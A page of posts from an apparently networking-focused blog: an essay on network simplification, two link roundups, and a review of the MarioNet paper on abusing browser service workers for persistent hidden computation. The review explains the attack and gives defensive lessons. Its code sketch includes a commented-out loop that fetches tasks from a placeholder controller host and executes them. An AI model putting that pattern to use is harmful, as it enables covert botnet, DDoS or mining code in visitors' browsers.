Posts by Russ

Practical Simplification

Simplification is a constant theme not only here and in my talks, but across the network engineering world right now. But what does this mean practically? Looking at a complex network, how do you begin simplifying?

The first option is to abstract, abstract again, and abstract some more. But before diving into deep abstraction, remember that abstraction is both a good and a bad thing. Abstraction can reduce the amount of state in a network, and reduce the speed at which that state changes. Abstraction can cover a multitude of sins in the legacy part of the network, but abstractions also leak; in fact, all non-trivial abstractions leak. Following this logic through: all non-trivial abstractions leak; the more non-trivial the abstraction, the more it will leak; and the more complexity an abstraction is covering, the less trivial the abstraction will be. Hence: the more complexity you are covering with an abstraction, the more it will leak.

Abstraction, then, is only one part of the solution. You must not only abstract, but you must also simplify the underlying bits of the system you are covering with the abstraction. This is a point we often miss.

Which returns us to our original question. The first answer to the question is this: minimize.

Minimize the number of technologies you are using. Of course, minimization is not so … simple … because it is a series of tradeoffs. You can minimize the number of protocols you are using to build the network, or you can minimize the number of things you are using each protocol for. This is why you layer things, which helps you understand how and where to modularize, focusing different components on different purposes, and then thinking about how those components interact. Ultimately, what you want is precisely the number of modules required to do the job to a specific level of efficiency, and not one module more (or less).

Minimize the kinds of “things” you are using. Try to use one data center topology, one campus topology, one regional topology, etc. Try to use one kind of device (whether virtual or physical) in each “role.” Try to reduce the number of “roles” in the network.

Think of everything, from protocols to “places,” as “modules,” and then try to reduce the number of modules. Modules should be chosen for repeatability, functional division, and optimal abstraction.

The second answer to the original question is: architecture should move slowly, components quickly.

The architecture is not the network, nor even the combination of all the modules.

Think of a building. Every building has bathrooms (I assume). All those bathrooms have sinks (I assume). The sinks need to fit the style of the building, and the number of sinks needs to match the needs of the building overall. But the sinks can change rapidly, in response to the changing architecture of the building, while the building, its purpose, and its style change much more slowly. Architecture should change slowly, components more rapidly.

This is another reason to create modules: each module can change as needed, but the architecture of the overall system needs to change more slowly and intentionally. Thinking in systemic terms helps differentiate between the architecture and the components. Each component should fit within the overall architecture, and each component should play a role in shaping the architecture. Does the organization you support rely on deep internal communication across a wide geographic area? Or does it rely on lots of smaller external communications across a narrow geographic area? The style of communication in your organization makes a huge difference in the way the network is built, just like a school or hospital has different needs in terms of sinks than a shopping mall.

So these are, at least, two rules for simplification you can start thinking about how to apply in practical ways: modularize, choose modules carefully, reduce the number of kinds of modules, and think about what needs to change quickly and what needs to change slowly.

Throwing abstraction at the problem does not, ultimately, solve it. Abstraction must be combined with a lot of thinking about what you are abstracting and why.

Weekend Reads 041919

A cybersecurity professional today demonstrated a long-known unpatched weakness in Microsoft’s Azure cloud service by exploiting it to take control over Windows Live Tiles, one of the key features Microsoft built into Windows 8 operating system. —Mohit Kumar

A team of security researchers on Wednesday issued a stern warning about a DNS Hijacking campaign being carried out by an advanced, state-sponsored actor believed to be targeting sensitive networks and systems. —CircleID

Security researchers say they have found a new victim of the hacking group behind the potentially destructive malware, which targets critical infrastructure, known as Triton or Trisis. —Lorenzo Franceschi-Bicchierai

By pushing client-side DNS queries into HTTPS the Internet itself has effectively lost control of the client end of DNS, and each and every application, including the vast array of malware, can use DOH and the DNS as a command and control channel in a way that is undetectable by the client or client’s network operator. —Geoff Huston

The expectations are often high, not only for the MDM solution’s ability to massively reduce the administrative workload of keeping track of, updating, and managing the often hundreds or thousands of devices within a company, but also regarding the improvements to the level of security that an MDM solution is regularly advertised to provide. —Florian Kiersch

But this is only the most obvious manifestation of Chinese maritime strategy. Another key element, one that’s far harder to discern, is Beijing’s increasing influence in constructing and repairing the undersea cables that move virtually all the information on the internet. To understand the totality of China’s “Great Game” at sea, you have to look down to the ocean floor. —James Stavridis

As governments across the world have awoken to the immensely disruptive power of the internet, they have moved swiftly to contain and shape its forces in ways that mirror their national interests. —Kalev Leetaru

He turned up some significant results that contributed to the ethos of the time: your personality is baked into who you are and is probably secretly determining many of your choices in life. Your job is to discover your personality and then find the right role for yourself in life so that you can find happiness without doing violence to your true self. (Remember how they wrote “never change” in your yearbook?) —Jeffrey A. Tucker

There are many ways to think about where your data is stored. The most popular today are centralized vs decentralized, and the other is where the borders are. Today, I’ll only discuss the latter. —Kris Constable

But by the end, I realized I disagree deeply with Medium about the ethics of design. And by ethics, I mean something simple: though Medium and I are both making tools for writers, what I want for writers and what Medium wants couldn’t be more different. Medium may be avoiding what made the typewriter bad, but it’s also avoiding what made it good. Writers who are tempted to use Medium—or similar publishing tools—should be conscious of these tradeoffs. —Matthew Butterick

Why You Should Block Notifications and Close Your Browser

Every so often, while browsing the web, you run into a web page that asks if you would like to allow the site to push notifications to your browser. Apparently, according to the paper under review, about 12% of the people who receive this request allow notifications. What, precisely, is this doing, and what are the side effects?

Papadopoulos, Panagiotis, Panagiotis Ilia, Michalis Polychronakis, Evangelos P. Markatos, Sotiris Ioannidis, and Giorgos Vasiliadis. “Master of Web Puppets: Abusing Web Browsers for Persistent and Stealthy Computation.” In Proceedings 2019 Network and Distributed System Security Symposium. San Diego, CA: Internet Society, 2019. https://doi.org/10.14722/ndss.2019.23070.

Allowing notifications allows the server to kick off a particular kind of process on the local computer: a service worker. There are, in fact, two kinds of worker apps that can run “behind” a web site in HTML5: the web worker and the service worker. The web worker is designed to calculate or locally render some object that will appear on the site, such as decrypting a downloaded audio file for local playback. This moves the processing load (including the power and cooling costs!) from the server to the client, saving money for the hosting provider, and (potentially) rendering the object in question more quickly.
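The benign web worker case can be sketched in a few lines; note that “decode-worker.js” and expensiveDecode() are hypothetical names I am inventing for illustration, not anything from the paper:

```javascript
// Minimal sketch of offloading heavy computation to a web worker.
// "decode-worker.js" and expensiveDecode() are hypothetical names.
//
// Inside decode-worker.js, running on its own thread:
//   self.onmessage = (e) => self.postMessage(expensiveDecode(e.data));
//
// In the page, hand the heavy work off so the main thread stays responsive:
function startDecode(buffer, onDone) {
  if (typeof Worker === "undefined") return null; // only runs in a browser
  const worker = new Worker("decode-worker.js");
  worker.onmessage = (e) => onDone(e.data); // decoded result arrives here
  worker.postMessage(buffer);               // ship the raw bytes to the worker
  return worker;
}
```

The key property for the paper’s argument is simply that the work happens on the client’s CPU, in a thread the page’s visitor never sees.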

A service worker, on the other hand, is designed to support notifications. For instance, say you keep a news web site open all day in your browser. You do not necessarily want to reload the page every few minutes; instead, you would rather the site send you a notification through the browser when a new story has been posted. Since the service worker is designed to cause an action in the browser on receiving a notification from the server, it has direct access to the network side of the host, and it can run even when the tab showing the web site is not visible.
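The benign news-site case might look something like this sketch; “/sw.js” and the server key below are placeholders invented for illustration, not from any real site:

```javascript
// Sketch of the benign case: a news site subscribing the browser for
// push so new stories arrive without reloading the page.
// "/sw.js" and the key below are placeholders.
const VAPID_PUBLIC_KEY = "placeholder-public-key";

async function subscribeForNews() {
  if (typeof navigator === "undefined" || !("serviceWorker" in navigator)) {
    return null; // push subscription requires a browser
  }
  const reg = await navigator.serviceWorker.register("/sw.js");
  return reg.pushManager.subscribe({
    userVisibleOnly: true,                  // every push must show a notification
    applicationServerKey: VAPID_PUBLIC_KEY, // identifies the pushing server
  });
}

// Inside /sw.js, the worker reacts even when the tab is hidden:
// self.addEventListener("push", (e) =>
//   self.registration.showNotification("News", { body: e.data.text() }));
```

The subscription outlives the page view, which is exactly the property the attack described below abuses.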

In fact, because service workers are sometimes used to coordinate the information on multiple tabs, a service worker can both communicate between tabs within the same browser and stay running in the browser’s context even after the tab that started the service worker is closed. To make certain other tabs do not block while the service worker is running, it runs in a separate thread; it can consume resources from a different core in your processor, so you are not aware (from a performance perspective) that it is running. To sweeten the pot, a service worker can be restarted after your browser has restarted by a special push notification from the server.

If a service worker sounds like a perfect setup for running code that can mine bitcoins or launch DDoS attacks from your web browser, then you might have a future in computer security. This is, in fact, what MarioNet, a proof-of-concept system described in this paper, does—it uses a service worker to consume resources off as many hosts as it can install itself on to do just about anything, including launching a DDoS attack.

Given the above, it should be simple enough to understand how the attack works. When the user lands on a web page, ask for permission to push notifications. A lot of web sites that do not seem to need such permission ask now, particularly ecommerce sites, so the question does not seem out of place almost anywhere any longer. Install a service worker, using the worker’s direct connection to the host’s network to communicate with a controller. The controller can then install code into the service worker and direct its execution. If the user closes their browser, randomly push notifications back to the browser, in case the user opens it again, thus recreating the service worker.
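Those steps can be sketched as a deliberately defanged skeleton; every name here (installWorker, “/sw.js”, controller.example) is a placeholder invented for illustration, not taken from the MarioNet paper:

```javascript
// Defanged sketch of the attack flow described above.
// All names and URLs here are invented placeholders.

// Steps 1 and 2, in the page: ask for notification permission, then
// register the service worker that will outlive this tab.
async function installWorker() {
  if (typeof navigator === "undefined" || !("serviceWorker" in navigator)) {
    return false; // requires a browser
  }
  if ((await Notification.requestPermission()) !== "granted") return false;
  await navigator.serviceWorker.register("/sw.js");
  return true;
}

// Steps 3 and 4, inside /sw.js: fetch tasks from the controller, run
// them, and come back to life when the server pushes a notification.
//
// self.addEventListener("push", () => { /* worker revived by push */ });
// setInterval(async () => {
//   const task = await fetch("https://controller.example/task")
//     .then((r) => r.text());
//   new Function(task)(); // run whatever the controller sent
// }, 60_000);
```

Nothing in this flow requires an exploit; every step uses the APIs exactly as designed.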

Since the service worker runs in a separate thread, the user will not notice any impact on web browsing performance from the use of their resources—in fact, MarioNet’s designers use fine-grained tracking of resources to ensure they do not consume enough to be noticed. Since the service worker runs between the browser and the host operating system, no defenses built into the browser can detect the network traffic to raise a flag. Since the service worker is running in the context of the browser, most anti-virus software packages will give the traffic and processing a pass.

Lessons learned?

First, making something powerful from a compute perspective will always open holes like this. There will never be any sort of system that allows the transfer of computation from one system to another without also opening some hole which can be exploited.

Second, abstraction hides complexity, even the complexity of an attack or security breach, nicely. Abstraction is like anything else in engineering: if you haven’t found the tradeoffs, you haven’t looked hard enough.

Third, close your browser when you are done. The browser is, in many ways, an open door to the outside world through which all sorts of people can make it into your computer. I have often wanted to create a VM or container in which I can run a browser from a server on the ‘net. When I’m done browsing, I can shut the entire thing down and restore the state to “clean.” No cookies, no java stuff, no nothing. A nice fresh install each time I browse the web. I’ve never gotten around to building this, but I should really put it on my list of things to do.

Fourth, don’t accept inbound connection requests without really understanding what you are doing. A notification push is, after all, just another inbound connection request. It’s like putting a hole in your firewall for that one FTP server that you can’t control. Only it’s probably worse.

Weekend Reads 041119

Since at least the middle of the last century, the question of how to get employees to improve has generated a good deal of opinion and research. —Marcus Buckingham and Ashley Goodall

Should the IETF publish standard specifications of technologies that facilitate third-party eavesdropping on communications or should it refrain from working on such technologies? —Geoff Huston

In February, the company announced its intention to move forward with the development of the Curie cable, a new undersea line stretching from California to Chile. It will be the first private intercontinental cable ever built by a major non-telecom company. —Tyler Cooper

You have your morning coffee in hand, you’ve just finished your daily scrum, and you sit down at your computer to start your day. Up pops a Slack message. You scan your emails, then bounce back to Slack. —Sarah Wall

“Open core” evolved as one of the primary ways for companies that maintain an open source project to make money. They offer a product that at the “core” is the open source project, but with features that only paying customers have access to. MongoDB and Elastic… —Eric Anderson

EU antitrust regulators should consider forcing tech giants such as Google and Amazon to share their data with rivals rather than break them up, three academics enlisted by the European Commission said on Thursday. —Foo Yun Chee

For some of us, myself included, the sounds of old Office reruns are a nightly lullaby that help put us to sleep. Or so we think. As it turns out, the streaming content that plays while you slumber isn’t as harmless as we’d hope. —Stan Horaczek

Stefan Tanase, principal security researcher at Ixia, told Ars that the DNS servers described in this article were taken down and that the attackers have replaced them with new DNS servers. Ixia analyzed the rogue DNS server and found it targets the following domains: GMail.com, PayPal.com, Netflix.com, Uber.com, caix.gov.br, itau.com.br, bb.com.br, bancobrasil.com.br, sandander.com.br, pagseguro.uol.com.br, sandandernet.com.br, cetelem.com.br, and possibly other sites. —Dan Goodin

As an industry, we also don’t talk often enough about the cybersecurity threats that face domain name Registries — and the work we do to mitigate this — until it’s too late. —Nicolai Bezsonoff

As far as I know, OneWeb is still planning to offer service in Russia, but they have had to make financial and technical concessions. They agreed to become a minority partner in the company that will market their service in Russia and, significantly, they agreed to drop the inter-satellite laser links (ISLLs) from their constellation and pass all Russian traffic through ground stations in Russia. —Larry Press

Intel today launched a barrage of new products for the data center, tackling almost every enterprise workload out there. The company’s diverse range of products highlights how today’s data center is more than just processors, with network controllers, customizable FPGAs, and edge device processors all part of the offering. —Peter Bright